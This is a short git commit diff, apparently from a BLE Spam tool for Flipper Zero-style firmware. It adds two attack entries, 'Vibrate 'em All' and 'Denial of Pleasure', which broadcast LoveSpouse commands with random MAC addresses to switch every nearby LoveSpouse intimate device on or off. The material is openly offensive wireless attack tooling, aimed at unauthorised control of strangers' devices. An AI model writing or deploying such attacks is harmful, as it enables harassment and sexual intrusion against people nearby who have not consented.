Add Love Spouse toys to BLE Spam

First discovered by @mandomat
This commit is contained in:
Willy-JL
2023-11-14 00:08:34 +00:00
parent b0fcb61cff
commit 1451c4f9ba
8 changed files with 343 additions and 0 deletions

View File

@@ -108,6 +108,32 @@ static Attack attacks[] = {
.cfg.swiftpair = {},
},
},
{
.title = "Vibrate 'em All",
.text = "Activate all LoveSpouse toys",
.protocol = &protocol_lovespouse,
.payload =
{
.random_mac = true,
.cfg.lovespouse =
{
.state = LovespouseStatePlay,
},
},
},
{
.title = "Denial of Pleasure",
.text = "Disable all LoveSpouse toys",
.protocol = &protocol_lovespouse,
.payload =
{
.random_mac = true,
.cfg.lovespouse =
{
.state = LovespouseStateStop,
},
},
},
};
#define ATTACKS_COUNT ((signed)COUNT_OF(attacks))